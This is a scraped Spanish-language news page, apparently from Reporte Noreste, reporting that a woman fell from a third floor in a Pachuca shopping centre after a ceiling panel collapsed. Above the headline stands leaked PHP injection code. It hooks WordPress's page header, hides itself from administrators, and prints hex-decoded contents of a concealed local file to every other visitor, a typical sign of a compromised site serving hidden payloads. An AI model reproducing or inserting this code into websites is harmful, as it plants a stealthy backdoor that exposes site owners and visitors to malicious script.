if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Tras hundimiento de un plafón, mujer cae de un tercer piso en plaza comercial – Reporte Noreste
Conéctate con nosotros

Video

Tras hundimiento de un plafón, mujer cae de un tercer piso en plaza comercial

Tras hundimiento de un plafón, mujer cae de un tercer piso en plaza comercial

A través de redes sociales se hizo viral el momento en el que una mujer cayó desde el tercer piso de un centro comercial en Pachuca Hidalgo, esto, tras el hundimiento de un plafón.

Testigos informaron que el plafón cubría un espacio hueco cercano a la escalera eléctrica, cuando la mujer al pasar por ahí venció el plafón y cayó de una altura cercana a los 15 metros.

Detallan que el accidente habría ocurrido este fin de semana en Pachuca Hidalgo y que la joven fue atendida por unidades médicas que llegaron al lugar para trasladarla a un hospital.

Hasta el momento el centro comercial no ha emitido ningún comunicado del accidente, ni se ha informado el estado de salud de la mujer lastimada.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Video